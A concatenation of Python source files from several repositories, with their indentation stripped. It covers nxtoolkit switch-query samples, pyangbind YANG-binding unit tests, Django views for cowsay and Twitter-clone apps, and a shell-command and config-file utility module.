att = child['rtregcomEntry']['attributes']
g_child = child['rtregcomEntry']['children']
community = []
for item in g_child:
comm = item['rtregcomItem']['attributes']['community']
community.append(comm[16:])
entry=CommunityEntry(str(att['action']),
','.join(community),
str(att['order']))
com_list.add(entry)
return com_list
class RPM(BaseNXObject):
"""
This class defines Route Processor Module configuration
"""
def __init__(self, session=None, parent=None):
super(RPM, self).__init__(name='')
self._session= session
self._parent = parent
self.rpm_obj = 'rpmEntity'
def add(self, rpm_obj):
self._children.append(rpm_obj)
def get_url(self):
""" Return RPM url """
return '/api/node/mo/sys/rpm.json'
def get_json(self):
return super(RPM, self).get_json(obj_class=self.rpm_obj,
attributes={})
```
#### File: nxtoolkit/samples/nx-show-dns.py
```python
import sys
import nxtoolkit.nxtoolkit as NX
def main():
"""
Main execution routine
:return: None
"""
# Take login credentials from the command line if provided
# Otherwise, take them from your environment variables file ~/.profile
description = '''Simple application that logs on to the
Switch and displays the DNS details.'''
creds = NX.Credentials('switch', description)
args = creds.get()
# Login to Switch
session = NX.Session(args.url, args.login, args.password)
resp = session.login()
if not resp.ok:
print('%% Could not login to Switch')
sys.exit(0)
dns = NX.DNS.get(session)
print "Dns lookup state:", dns.get_admin_st()
for prof in dns.profiles:
print "\nDns profile name:", prof.name
for provider in prof.providers:
print "\tProvider ip:", provider.address
for domain in prof.domains:
print "\tDomain name:", domain.name
for domain_ext in prof.domain_exts:
print "\tDomain list name:", domain_ext.name
for host in prof.hosts:
print "\tHost name:%s\t\tAddress:%s"% (host.name, host.address)
for vrf in prof.vrfs:
for provider in vrf.providers:
print "\tVrf name:%s\tProvider ip:%s"% (vrf.name,
provider.address)
for domain in vrf.domains:
print "\tVrf name:%s\tDomain name:%s"% (vrf.name,
domain.name)
for domain_ext in vrf.domain_exts:
print "\tVrf name:%s\tDomain list name:%s"% (vrf.name,
domain_ext.name)
if __name__ == '__main__':
main()
```
#### File: nxtoolkit/samples/nx-show-interface-stats.py
```python
from operator import attrgetter
import sys
import nxtoolkit.nxtoolkit as NX
def show_stats_short(args, interfaces):
"""
show stats short routine
:param args: command line arguments
:param interfaces: list of interfaces
:return: None
"""
# setup template and display header information
template = "{0:16} {1:16} {2:16} {3:16} {4:16} {5:16}"
print(template.format(" INTERFACE ", "Status", "RX BYTES/Sec",
"TX BYTES/Sec", "RX PKTs/Sec","TX PKTs/Sec"))
print(template.format("--------------", "------------ ", "------------ ",
"---------------", "---------------",
"---------------"))
template = "{0:16} {1:16} {2:16,.2f} {3:16,.2f} {4:16,.2f} {5:16,.2f}"
for interface in sorted(interfaces, key=attrgetter('if_name')):
interface.stats.get()
rec = []
allzero = True
for (counter_family, count_name) in [('rmonIfIn', 'octetRate'),
('rmonIfOut', 'octetRate'),
('rmonIfIn', 'packetRate'),
('rmonIfOut', 'packetRate')]:
rec.append(interface.stats.retrieve(counter_family, count_name))
if interface.stats.retrieve(counter_family, count_name) != 0:
allzero = False
if (args.nonzero and not allzero) or not args.nonzero:
print(template.format(interface.name, interface.operSt, *rec))
def show_stats_long(args, interfaces):
"""
show stats long routine
:param args: command line arguments
:param interfaces: list of interfaces
:return: None
"""
print('Interface {0}/{1}'.format(interfaces[0].module,interfaces[0].port))
stats = interfaces[0].stats.get()
for stats_family in sorted(stats):
print stats_family
for counter in sorted(stats[stats_family]):
print(' {0:>25}: {1}'.format(counter,
stats[stats_family][counter]))
def main():
"""
Main execution routine
:return: None
"""
# Take login credentials from the command line if provided
# Otherwise, take them from your environment variables file ~/.profile
description = '''Simple application that logs on to the Switch and
displays stats for all of the Interfaces.'''
creds = NX.Credentials('switch', description)
creds.add_argument('-i', '--interface',
type=str,
help='Specify a particular interface module/port e.g. 1/21')
creds.add_argument('-f', '--full', action="store_true",
help='''Show full statistics - only available
if interface is specified''')
creds.add_argument('-n', '--nonzero', action='store_true',
help='''Show only interfaces where the counters are not zero.
- only available if interface is NOT specified''')
args = creds.get()
# Login to switch
session = NX.Session(args.url, args.login, args.password)
resp = session.login()
if not resp.ok:
print('%% Could not login to Switch')
sys.exit(0)
# Download all of the interfaces and get their stats
# and display the stats
if args.interface:
interface = args.interface
if 'eth ' in interface:
interface = interface[4:]
#(module, port) = interface.split('/')
#interfaces = NX.Interface.get(session, module, port)
interfaces = NX.Interface.get(session, 'eth'+interface)
else:
interfaces = NX.Interface.get(session)
if not args.full or not args.interface:
show_stats_short(args, interfaces)
else:
show_stats_long(args, interfaces)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
pass
``` |
{
"source": "jonnyrocks/pyangbind",
"score": 2
} |
#### File: tests/config-false/run.py
```python
import unittest
from tests.base import PyangBindTestCase
class ConfigFalseTests(PyangBindTestCase):
yang_files = ["config-false.yang"]
def setUp(self):
self.test_instance = self.bindings.config_false()
def test_container_is_configurable_by_default(self):
self.assertTrue(self.test_instance.container._is_config)
def test_set_configurable_leaf_with_non_configurable_sibling(self):
allowed = True
try:
self.test_instance.container.subone.a_leaf = 1
except AttributeError:
allowed = False
self.assertTrue(allowed)
def test_leaf_is_configurable_by_default(self):
self.assertTrue(self.test_instance.container.subone.a_leaf._is_config)
def test_set_non_configurable_leaf(self):
allowed = True
try:
self.test_instance.container.subone.d_leaf = 1
except AttributeError:
allowed = False
self.assertFalse(allowed)
def test_leaf_reports_not_configurable_with_config_false(self):
self.assertFalse(self.test_instance.container.subone.d_leaf._is_config)
def test_set_leaf_in_non_configurable_container(self):
allowed = True
try:
self.test_instance.container.subtwo.b_leaf = 1
except AttributeError:
allowed = False
self.assertFalse(allowed)
def test_leaf_in_non_configurable_container_reports_not_configurable(self):
self.assertFalse(self.test_instance.container.subtwo.b_leaf._is_config)
def test_set_leaf_in_sub_container_of_non_configurable_container(self):
allowed = True
try:
self.test_instance.container.subtwo.subsubtwo.c_leaf = 1
except AttributeError:
allowed = False
self.assertFalse(allowed)
def test_leaf_in_sub_container_of_non_configurable_container_reports_not_configurable(self):
self.assertFalse(self.test_instance.container.subtwo.subsubtwo.c_leaf._is_config)
if __name__ == "__main__":
unittest.main()
```
#### File: tests/leaf-list/run.py
```python
from __future__ import unicode_literals
from tests.base import PyangBindTestCase
try:
import unittest2 as unittest
except ImportError:
import unittest
class LeafListTests(PyangBindTestCase):
yang_files = ["leaflist.yang"]
def setUp(self):
self.leaflist_obj = self.bindings.leaflist()
def test_container_exists(self):
self.assertTrue(hasattr(self.leaflist_obj, "container"))
def test_leaflist_exists(self):
self.assertTrue(hasattr(self.leaflist_obj.container, "leaflist"))
def test_leaflist_length_is_zero(self):
self.assertEqual(len(self.leaflist_obj.container.leaflist), 0)
def test_append_to_leaflist(self):
self.leaflist_obj.container.leaflist.append("itemOne")
self.assertEqual(len(self.leaflist_obj.container.leaflist), 1)
def test_retrieve_leaflist_item_value(self):
self.leaflist_obj.container.leaflist.append("itemOne")
self.assertEqual(self.leaflist_obj.container.leaflist[0], "itemOne")
def test_append_int_to_string_leaflist(self):
with self.assertRaises(ValueError):
self.leaflist_obj.container.leaflist.append(1)
def test_getitem(self):
self.leaflist_obj.container.leaflist.append("itemOne")
self.leaflist_obj.container.leaflist.append("itemTwo")
self.assertEqual(self.leaflist_obj.container.leaflist[1], "itemTwo")
def test_setitem(self):
self.leaflist_obj.container.leaflist.append("itemOne")
self.leaflist_obj.container.leaflist.append("itemTwo")
self.leaflist_obj.container.leaflist[1] = "indexOne"
self.assertEqual(self.leaflist_obj.container.leaflist[1], "indexOne")
def test_insert(self):
self.leaflist_obj.container.leaflist.append("itemOne")
self.leaflist_obj.container.leaflist.append("itemTwo")
self.leaflist_obj.container.leaflist[1] = "indexOne"
self.leaflist_obj.container.leaflist.insert(0, "indexZero")
self.assertEqual(self.leaflist_obj.container.leaflist[0], "indexZero")
def test_leaflist_grows_from_various_modification_methods(self):
self.leaflist_obj.container.leaflist.append("itemOne")
self.leaflist_obj.container.leaflist.append("itemTwo")
self.leaflist_obj.container.leaflist[1] = "indexOne"
self.leaflist_obj.container.leaflist.insert(0, "indexZero")
self.assertEqual(len(self.leaflist_obj.container.leaflist), 4)
def test_delete_item_from_leaflist(self):
self.leaflist_obj.container.leaflist.append("itemOne")
self.leaflist_obj.container.leaflist.append("itemTwo")
self.leaflist_obj.container.leaflist[1] = "indexOne"
self.leaflist_obj.container.leaflist.insert(0, "indexZero")
del self.leaflist_obj.container.leaflist[0]
self.assertEqual(len(self.leaflist_obj.container.leaflist), 3)
def test_get_full_leaflist(self):
self.leaflist_obj.container.leaflist.append("itemOne")
self.leaflist_obj.container.leaflist.append("itemTwo")
self.leaflist_obj.container.leaflist[1] = "indexOne"
self.leaflist_obj.container.leaflist.insert(0, "indexZero")
del self.leaflist_obj.container.leaflist[0]
self.assertEqual(
self.leaflist_obj.get(),
{"container": {"leaflist": ["itemOne", "indexOne", "itemTwo"], "listtwo": [], "listthree": []}},
)
def test_leaflist_assignment(self):
self.leaflist_obj.container.leaflist = ["itemOne", "itemTwo"]
self.assertEqual(self.leaflist_obj.container.leaflist, ["itemOne", "itemTwo"])
def test_leaflist_assignment_of_wrong_type(self):
with self.assertRaises(ValueError):
self.leaflist_obj.container.leaflist = [1, 2]
def test_restricted_string(self):
self.leaflist_obj.container.listtwo.append("a-valid-string")
self.assertEqual(len(self.leaflist_obj.container.listtwo), 1)
def test_restricted_string_invalid_value(self):
with self.assertRaises(ValueError):
self.leaflist_obj.container.listtwo.append("broken-string")
def test_union_type(self):
for pair in [(1, True), ("fish", True), ([], False)]:
with self.subTest(pair=pair):
allowed = True
try:
self.leaflist_obj.container.listthree.append(pair[0])
except ValueError:
allowed = False
self.assertEqual(allowed, pair[1])
def test_leaf_lists_are_unique_after_assignment(self):
self.leaflist_obj.container.leaflist = ["foo", "bar", "foo"]
self.assertEqual(self.leaflist_obj.container.get(filter=True), {"leaflist": ["foo", "bar"]})
def test_leaf_lists_are_unique_after_append(self):
self.leaflist_obj.container.leaflist.append("foo")
self.leaflist_obj.container.leaflist.append("bar")
self.leaflist_obj.container.leaflist.append("foo")
self.assertEqual(self.leaflist_obj.container.get(filter=True), {"leaflist": ["foo", "bar"]})
def test_leaf_lists_insert_non_unique_value_raises_keyerror(self):
self.leaflist_obj.container.leaflist[0] = "foo"
self.leaflist_obj.container.leaflist[1] = "bar"
with self.assertRaises(ValueError):
self.leaflist_obj.container.leaflist[2] = "foo"
if __name__ == "__main__":
unittest.main()
```
#### File: serialise/json-serialise/run.py
```python
import json
import os.path
import unittest
from decimal import Decimal
import six
from bitarray import bitarray
from pyangbind.lib.pybindJSON import dumps
from pyangbind.lib.xpathhelper import YANGPathHelper
from tests.base import PyangBindTestCase
class JSONSerialiseTests(PyangBindTestCase):
yang_files = ["json-serialise.yang"]
pyang_flags = ["--use-xpathhelper"]
def setUp(self):
self.yang_helper = YANGPathHelper()
self.serialise_obj = self.bindings.json_serialise(path_helper=self.yang_helper)
def test_serialise_container(self):
self.serialise_obj.two.string_test = "twenty-two"
with open(os.path.join(os.path.dirname(__file__), "json", "container.json"), "r") as fp:
self.assertEqual(
json.loads(dumps(self.yang_helper.get("/two")[0])),
json.load(fp),
"Invalid output returned when serialising a container.",
)
def test_full_serialise(self):
self.serialise_obj.c1.l1.add(1)
for signed in ["int", "uint"]:
for size in [8, 16, 32, 64]:
name = "%s%s" % (signed, size)
setter = getattr(self.serialise_obj.c1.l1[1], "_set_%s" % name)
setter(1)
self.serialise_obj.c1.l1[1].restricted_integer = 6
self.serialise_obj.c1.l1[1].string = "bear"
self.serialise_obj.c1.l1[1].restricted_string = "aardvark"
self.serialise_obj.c1.l1[1].union = 16
self.serialise_obj.c1.l1[1].union_list.append(16)
self.serialise_obj.c1.l1[1].union_list.append("chicken")
self.serialise_obj.c1.t1.add(16)
self.serialise_obj.c1.t1.add(32)
self.serialise_obj.c1.l1[1].leafref = 16
self.serialise_obj.c1.l1[1].binary = bitarray("010101")
self.serialise_obj.c1.l1[1].boolean = True
self.serialise_obj.c1.l1[1].enumeration = "one"
self.serialise_obj.c1.l1[1].identityref = "idone"
self.serialise_obj.c1.l1[1].typedef_one = "test"
self.serialise_obj.c1.l1[1].typedef_two = 8
self.serialise_obj.c1.l1[1].one_leaf = "hi"
for i in range(1, 5):
self.serialise_obj.c1.l1[1].ll.append(six.text_type(i))
self.serialise_obj.c1.l1[1].next_hop.append("DROP")
self.serialise_obj.c1.l1[1].next_hop.append("192.0.2.1")
self.serialise_obj.c1.l1[1].next_hop.append("fish")
self.serialise_obj.c1.l1[1].typedef_decimal = Decimal("21.21")
self.serialise_obj.c1.l1[1].range_decimal = Decimal("4.44443322")
self.serialise_obj.c1.l1[1].typedef_decimalrange = Decimal("42.42")
self.serialise_obj.c1.l1[1].decleaf = Decimal("42.4422")
for i in range(1, 10):
self.serialise_obj.c1.l2.add(i)
pybind_json = json.loads(dumps(self.serialise_obj))
with open(os.path.join(os.path.dirname(__file__), "json", "expected-output.json"), "r") as fp:
external_json = json.load(fp)
self.assertEqual(pybind_json, external_json, "JSON did not match expected output.")
if __name__ == "__main__":
unittest.main()
```
#### File: tests/serialise/xml_utils.py
```python
def xml_tree_equivalence(e1, e2):
"""
Rough XML comparison function based on https://stackoverflow.com/a/24349916/1294458.
This is necessary to provide some sort of structural equivalence of a generated XML
tree; however there is no XML deserialisation implementation yet. A naive text comparison
fails because it seems it enforces ordering, which seems to vary between python versions
etc. Strictly speaking, I think, only the *leaf-list* element mandates ordering.. this
function uses simple sorting on tag name, which I think, should maintain the relative
order of these elements.
"""
if e1.tag != e2.tag:
return False
if e1.text != e2.text:
return False
if e1.tail != e2.tail:
return False
if e1.attrib != e2.attrib:
return False
if len(e1) != len(e2):
return False
e1_children = sorted(e1.getchildren(), key=lambda x: x.tag)
e2_children = sorted(e2.getchildren(), key=lambda x: x.tag)
if len(e1_children) != len(e2_children):
return False
return all(xml_tree_equivalence(c1, c2) for c1, c2 in zip(e1_children, e2_children))
```
#### File: tests/strings/run.py
```python
from __future__ import unicode_literals
import unittest
from tests.base import PyangBindTestCase
class StringTests(PyangBindTestCase):
yang_files = ["string.yang"]
def setUp(self):
self.instance = self.bindings.string()
def test_string_leaf_is_not_changed_by_default(self):
self.assertFalse(self.instance.string_container.string_leaf._changed())
def test_set_basic_string_value_on_string_leaf(self):
self.instance.string_container.string_leaf = "TestValue"
self.assertEqual(self.instance.string_container.string_leaf, "TestValue")
def test_integer_gets_cast_to_string(self):
self.instance.string_container.string_leaf = 1
self.assertEqual(self.instance.string_container.string_leaf, "1")
def test_string_leaf_gets_marked_as_changed(self):
self.instance.string_container.string_leaf = "TestValue"
self.assertTrue(self.instance.string_container.string_leaf._changed())
def test_concatenation_to_string_leaf(self):
self.instance.string_container.string_leaf = "TestValue"
self.instance.string_container.string_leaf += "Addition"
self.assertEqual(self.instance.string_container.string_leaf, "TestValueAddition")
def test_string_leaf_with_default_is_blank(self):
self.assertEqual(self.instance.string_container.string_default_leaf, "")
def test_string_leaf_with_default_has_correct_default_value_hidden(self):
self.assertEqual(self.instance.string_container.string_default_leaf._default, "string")
def test_string_leaf_with_default_and_pattern_has_correct_default_value_hidden(self):
self.assertEqual(self.instance.string_container.restricted_string_default._default, "beep")
def test_set_valid_value_on_restricted_string(self):
allowed = True
try:
self.instance.string_container.restricted_string = "aardvark"
except ValueError:
allowed = False
self.assertTrue(allowed)
def test_set_invalid_value_on_restricted_string(self):
with self.assertRaises(ValueError):
self.instance.string_container.restricted_string = "bear"
def test_fixed_length_string(self):
for (value, valid) in [("a", False), ("ab", True), ("abc", False)]:
with self.subTest(value=value, valid=valid):
allowed = True
try:
self.instance.string_container.restricted_length_string = value
except ValueError:
allowed = False
self.assertEqual(allowed, valid)
def test_fixed_length_string_with_pattern(self):
for (value, valid) in [("a", False), ("ba", False), ("abc", False), ("ab", True)]:
with self.subTest(value=value, valid=valid):
allowed = True
try:
self.instance.string_container.restricted_length_and_pattern_string = value
except ValueError:
allowed = False
self.assertEqual(allowed, valid)
def test_string_with_length_as_range_with_max(self):
for (value, valid) in [("short", False), ("loooooooong", True)]:
with self.subTest(value=value, valid=valid):
allowed = True
try:
self.instance.string_container.restricted_length_string_with_range = value
except ValueError:
allowed = False
self.assertEqual(allowed, valid)
def test_string_with_length_as_range_with_upper_bound(self):
for (value, valid) in [("short", False), ("loooooooong", True), ("toooooooooolooooooooong", False)]:
with self.subTest(value=value, valid=valid):
allowed = True
try:
self.instance.string_container.restricted_length_string_range_two = value
except ValueError:
allowed = False
self.assertEqual(allowed, valid)
def test_string_leaf_with_complex_length(self):
for (value, valid) in [
("strLength10", True),
("LengthTwelve", True),
("strTwentyOneCharsLong", False),
("aReallyLongStringMoreThan30CharsLong", True),
("anEvenLongerStringThatIsMoreThanFortyChars", False),
]:
with self.subTest(value=value, valid=valid):
allowed = True
try:
self.instance.string_container.stringLeafWithComplexLength = value
except ValueError:
allowed = False
self.assertEqual(allowed, valid)
def test_string_leaf_pattern_with_dollar(self):
for (value, valid) in [("fi$h", True), ("void", False), ("fi$ho", True)]:
with self.subTest(value=value, valid=valid):
allowed = True
try:
self.instance.string_container.stringLeafWithPatternWithDollar = value
except ValueError:
allowed = False
self.assertEqual(allowed, valid)
def test_string_leaf_pattern_with_dollar_at_end(self):
for (value, valid) in [("fi$h", True), ("void", False), ("fi$ho", False)]:
with self.subTest(value=value, valid=valid):
allowed = True
try:
self.instance.string_container.dollarAtEnd = value
except ValueError:
allowed = False
self.assertEqual(allowed, valid)
if __name__ == "__main__":
unittest.main()
```
#### File: xpath/04-root/run.py
```python
import json
import os
import unittest
import pyangbind.lib.pybindJSON as pbJ
from pyangbind.lib.serialise import pybindJSONDecoder
from pyangbind.lib.xpathhelper import YANGPathHelper
from pyangbind.lib.yangtypes import safe_name
from tests.base import PyangBindTestCase
class XPathRootTests(PyangBindTestCase):
yang_files = ["root-tc04-a.yang", "root-tc04-b.yang"]
pyang_flags = ["--use-extmethods", "--use-xpathhelper"]
def setUp(self):
self.path_helper = YANGPathHelper()
self.instance_a = self.bindings.root_tc04_a(path_helper=self.path_helper)
self.instance_b = self.bindings.root_tc04_b(path_helper=self.path_helper)
def test_001_check_containers(self):
self.assertIsNot(getattr(self.instance_a, safe_name("root-tc04-a"), None), None)
self.assertIsNot(getattr(self.instance_b, safe_name("root-tc04-b"), None), None)
def test_002_base_gets(self):
# each of these raise exceptions so will cause test case failures
self.path_helper.get_unique("/")
self.path_helper.get_unique("/root-tc04-a")
self.path_helper.get_unique("/root-tc04-b")
def test_003_base_sets(self):
a = self.path_helper.get_unique("/root-tc04-a")
a.a = "little-cottonwood"
self.assertEqual(self.instance_a.root_tc04_a.a, "little-cottonwood")
b = self.path_helper.get_unique("/root-tc04-b")
b.b = "big-cottonwood"
self.assertEqual(self.instance_b.root_tc04_b.b, "big-cottonwood")
def test_004_serialise(self):
self.instance_a.root_tc04_a.a = "emigration"
self.instance_b.root_tc04_b.b = "alpine-fork"
with open(os.path.join(os.path.dirname(__file__), "json", "04-serialise.json")) as fp:
expected_json = json.load(fp)
v = json.loads(pbJ.dumps(self.path_helper.get_unique("/")))
self.assertEqual(v, expected_json)
with open(os.path.join(os.path.dirname(__file__), "json", "04b-ietf-serialise.json")) as fp:
expected_ietf_json = json.load(fp)
v = json.loads(pbJ.dumps(self.path_helper.get_unique("/"), mode="ietf"))
self.assertEqual(v, expected_ietf_json)
def test_005_deserialise(self):
root = self.path_helper.get_unique("/")
with open(os.path.join(os.path.dirname(__file__), "json", "05-deserialise.json"), "r") as fp:
pybindJSONDecoder.load_json(json.load(fp), None, None, obj=root)
v = json.loads(pbJ.dumps(self.path_helper.get_unique("/")))
with open(os.path.join(os.path.dirname(__file__), "json", "05-deserialise.json"), "r") as fp:
x = json.load(fp)
self.assertEqual(v, x)
def test_006_ietf_deserialise(self):
root = self.path_helper.get_unique("/")
with open(os.path.join(os.path.dirname(__file__), "json", "06-deserialise-ietf.json"), "r") as fp:
pybindJSONDecoder.load_ietf_json(json.load(fp), None, None, obj=root)
v = json.loads(pbJ.dumps(self.path_helper.get_unique("/"), mode="ietf"))
with open(os.path.join(os.path.dirname(__file__), "json", "06-deserialise-ietf.json"), "r") as fp:
x = json.load(fp)
self.assertEqual(v, x)
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "JonnySueck/Cowsay",
"score": 2
} |
#### File: Cowsay/cowsay/views.py
```python
from django.http import HttpResponse
from django.shortcuts import render
from .models import Post
from .forms import PostForm
import subprocess
# Create your views here.
def history(request):
posts = Post.objects.all()
number_of_posts = len(posts)
last = number_of_posts
first = 1
if number_of_posts > 10:
first = number_of_posts - 10
post = Post.objects.get(id=first)
cowsay_type = post.cowsay_type
message = post.text
cow = subprocess.run(['cowsay', '-f', f'{cowsay_type}',
f'{message}'], capture_output=True)
results = cow.stdout.decode()
if number_of_posts > 10:
start = number_of_posts - 10
else:
start = 0
posts = Post.objects.all()[start:last]
return render(request, 'history.html', {
'posts': posts,
'results': results
})
def index_view(request):
if request.method == 'POST':
form = PostForm(request.POST)
if form.is_valid():
data = form.cleaned_data
Post.objects.create(
text=data['text'],
cowsay_type=data['cowsay_type']
)
text = data['text']
cowsay_type = data['cowsay_type']
form = PostForm()
html = HttpResponse(
"Your post has successfully been submitted \
<a href='/'>go home</a>")
html.set_cookie('lastpost', text)
html.set_cookie('cowsay', cowsay_type)
return html
if request.COOKIES.get('lastpost'):
form = PostForm()
last_post = request.COOKIES.get('lastpost')
cowsay_type = request.COOKIES.get('cowsay')
cow = subprocess.run(['cowsay', '-f', f'{cowsay_type}',
f'{last_post}'], capture_output=True)
results = cow.stdout.decode()
message = 'welcome back to cowsay'
return render(request, 'index.html', {
'show': results, 'form': form,
'welcome': message})
shows = subprocess.run(['cowsay', 'Welcome!'],
capture_output=True)
result = shows.stdout.decode()
form = PostForm()
return render(request, 'index.html', {
'form': form,
'show': result,
})
``` |
{
"source": "JonnySueck/TwitterClone",
"score": 2
} |
#### File: TwitterClone/authentication/views.py
```python
from django.shortcuts import render
from .forms import SignupForm
from twitteruser.views import TwitterUser
# Create your views here.
def signup_view(request):
if request.method == 'POST':
form = SignupForm(request.POST)
if form.is_valid():
data = form.cleaned_data
new_user = TwitterUser.objects.create_user(
password=data['password'],
username=data['username'],
)
return render(request, 'index.html', {'user_new': new_user})
form = SignupForm()
return render(request, 'registration/signup.html', {'form': form})
``` |
{
"source": "jonnyt886/jpy",
"score": 3
} |
#### File: jonnyt886/jpy/colours.py
```python
import sys
from jpy import util
# Bash colours - taken from http://tldp.org/HOWTO/Bash-Prompt-HOWTO/x329.html
# Black 0;30 Dark Gray 1;30
# Blue 0;34 Light Blue 1;34
# Green 0;32 Light Green 1;32
# Cyan 0;36 Light Cyan 1;36
# Red 0;31 Light Red 1;31
# Purple 0;35 Light Purple 1;35
# Brown 0;33 Yellow 1;33
# Light Gray 0;37 White 1;37
# Example usage: echo -e ${COL_GRAY}This is some text${COL_NONE}
colours_dict = {
"BLACK" :"\033[0:30m",
"GRAY" :"\033[1;30m",
"RED" :"\033[0;31m",
"LRED" :"\033[1;31m",
"GREEN" :"\033[0;32m",
"LGREEN" :"\033[1;32m",
"BROWN" :"\033[0;33m",
"YELLOW" :"\033[1;33m",
"DBLUE" :"\033[0;34m",
"BLUE" :"\033[1;34m",
"PURPLE" :"\033[0;35m",
"LPURPLE" :"\033[1;35m",
"CYAN" :"\033[0;36m",
"LCYAN" :"\033[1;36m",
"LGRAY" :"\033[0;37m", # Already declared as 0;0m
"WHITE" :"\033[1;37m",
"NONE" :"\033[0m", # No colours
}
me = sys.modules[__name__]
for (k, v) in list(colours_dict.items()):
setattr(me, k, v)
def remove_colours(string):
string = string.replace(BLACK, '')
string = string.replace(GRAY, '')
string = string.replace(RED, '')
string = string.replace(LRED, '')
string = string.replace(GREEN, '')
string = string.replace(LGREEN, '')
string = string.replace(BROWN, '')
string = string.replace(YELLOW, '')
string = string.replace(DBLUE, '')
string = string.replace(BLUE, '')
string = string.replace(PURPLE, '')
string = string.replace(LPURPLE, '')
string = string.replace(CYAN, '')
string = string.replace(LCYAN, '')
string = string.replace(LGRAY, '')
string = string.replace(WHITE, '')
string = string.replace(NONE, '')
return string
# Performs variable-expansion on a string for colour variables
# defined in this file.
# e.g. expand_colours("${GREEN}Hello my name is ${YELLOW}<NAME>${NONE}")
#
# if 'add_none' is True, this method will automatically add ${NONE} to the end
# of the string.
def expand_colours(string, add_none = True):
result = util.expand(string, colours_dict)
if add_none:
result = result + NONE
return result
```
#### File: jonnyt886/jpy/command.py
```python
from datetime import timedelta, datetime
import os, sys
from optparse import (OptionParser, OptionGroup)
import shlex, subprocess
# Contains the result of a command run using run_command().
class CommandResult:
"""
init parameters:
process: process object
stdout: string representing stdout
stderr: string representing stderr
start_time: start time (as a datetime)
finish_time: start time (as a datetime)
exit_code: process exit code
this object will also calculate:
running_time (as a timedelta)
success
"""
def __init__(self, process, stdout, stderr, start_time, finish_time, exit_code):
self.process = process
self.stdout = stdout
self.stderr = stderr
self.start_time = start_time
self.finish_time = finish_time
self.running_time = start_time - finish_time
self.exit_code = exit_code
self.success = exit_code == 0
@property
def stdout_lines(self):
return self.stdout.split(b'\n')
@property
def stderr_lines(self):
return self.stderr.split(b'\n')
def execute(command_line, directory = None, \
print_timing_info = False, shell='/bin/bash', \
grab_output = True, ignore_exit_code = False, \
input_string = None, auto_decode=True,
decode_using=sys.stdout.encoding):
"""Run an operating system command. This is an updated
version of run_command() which returns a CommandResult
object instead of a tuple.
command_line: the command line to run. As the command
is run inside a shell, this can be a shell command
directory: if not None, change the working directory
to the one specified when making the call
grab_output: if True, wait until the command is finished
and return output as a tuple (stdout, stderr). If
False, the process can interact with the terminal
and no stdout/stderr is collected. If you want to
pass input to the process, this must be True.
ignore_exist_code: if False, an exception is thrown if
the process exits with a non-zero exit code. If this
is true then the exit code is returned regardless of
value
input_string: a String representing input to pass into
the process - grab_output must be True for this to work
auto_decode: automatically decode the output from the
command's stdout/stderr streams using the encoding
specified by decode_using (decode_using defaults to this
script's output encoding, auto_decode defaults to True)
decode_using: the encoding used to decode stdout/stderr. Only
has an effect if auto_decode is set to True. Defaults to
sys.stdout.encoding.
"""
# For stuff we run through the shell shlex splitting doesn't work,
# so we just pass command_line straight through to bash.
#args = shlex.split(command_line)
stdout = None
stderr = None
p = None
before = datetime.now()
if grab_output:
stdout, stderr, p = _run_grab_output(command_line,
shell, directory, input_string)
else:
p = _run_no_output(command_line, shell, directory)
after = datetime.now()
if not ignore_exit_code and p.returncode != 0:
raise OSError('Command "' + str(command_line) + \
'" failed with exit code: ' + str(p.returncode))
# don't split on \n, leave it as a string
# if grab_output:
# stdout = stdout.split('\n')
# stderr = stderr.split('\n')
if auto_decode:
if stdout: stdout=stdout.decode(decode_using)
if stderr: stderr=stderr.decode(decode_using)
return CommandResult(
process=p,
stdout=stdout,
stderr=stderr,
start_time=before,
finish_time=after,
exit_code = p.returncode)
def _run_grab_output(command_line, shell, directory, input_string = None):
#print '_run_grab_output', command_line, shell, directory
if input_string == None:
stdin = None
else:
stdin=subprocess.PIPE
do_shell = (shell != None)
if do_shell: executable = shell
else: executable = None
p = subprocess.Popen(command_line, executable=executable, shell=do_shell, \
env=os.environ, cwd=directory, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=stdin)
stdout, stderr = p.communicate(input_string)
p.wait()
return stdout, stderr, p
def _run_no_output(command_line, shell, directory):
#print(('_run_no_output[command_line=', command_line, 'shell=', shell, 'dir=', directory))
do_shell = (shell != None)
if do_shell: executable = shell
else: executable = None
p = subprocess.Popen(command_line, executable=executable, shell=do_shell, \
env=os.environ, cwd=directory)
p.wait()
return p
```
#### File: jonnyt886/jpy/configfile.py
```python
import re, os
from jpy.util import expand, match_groups
from jpy.asrt import *
# Regex for values (e.g. "mykey = myval")
VALUE_REGEX = re.compile('\s*([^\s]+)\s*=\s*(.*)\s*')
# Comment regex (e.g. "# some comment")
COMMENT_REGEX = re.compile('^\s*#')
# Import regex (e.g. "import somefile")
IMPORT_REGEX = re.compile('^import (.+)$')
# Used to match trailing slashes (for line-continuation)
NEWLINE = re.compile('.*(\\\\[\\r\\n]+)$')
def convert_to_bool(s):
"""Intelligently converts a string to a bool.
All of 'yes', 'true', 'on', '1' convert to True.
All of 'no', 'false', 'off', '0' convert to False.
"""
# values for booleans
TRUE = [ 'yes', 'true', 'on', '1' ]
FALSE = [ 'no', 'false', 'off', '0' ]
t = type(s)
# deliberately don't handle None as we want to preserve
# the distinction between a bool being set and not being set
if t is bool:
return s
elif t in [list, tuple]:
if len(s) == 0: return False
s = s[0].lower()
# if we get here it must be a string, otherwise die
asrt(t in [str, str])
if s in TRUE: return True
elif s in FALSE: return False
else: raise ValueError('invalid boolean value: ' + str(s))
def convert_value(value, val_type):
"""Convert the given value to the correct type as determined
by config_value. Assumes that value is a string."""
# deliberately public so that other modules can call this
# always preserve None-ness
if value == None: return None
# handle bools especially
if val_type == bool:
return convert_to_bool(value)
else:
return val_type(value)
class ConfigFile(object):
def __init__(self, config_file, defaults = {},
must_exist = True, config_values = None):
"""Initialise the ConfigFile.
config_file is the path to a file that we can parse.
defaults is an optional dict of default key->value
pairs to use (added into the config file after the
file is loaded for unset keys)
must_exist, if false, allows you to create a blank
ConfigFile, in which case config_file doesn't need
to exist.
config_values, if specified, should be a list of
ConfigValue instances, which provide configuration
for settings which will be stored in this ConfigFile.
If config_values is specified:
- all settings in files loaded into the ConfigFile
must have a corresponding ConfigValue with the same
name
- all return values of get() will be converted according
to the corresponding ConfigValue's val_type
- default values will be returned by get() if the
setting requested is not present and the corresponding
ConfigValue has a default_value set
"""
self.items_dict = {}
self.must_exist = must_exist
self.config_values = None
if config_values:
self.config_values = { x.name.lower(): x for x in config_values }
# store values in a list too so that we get ordering?
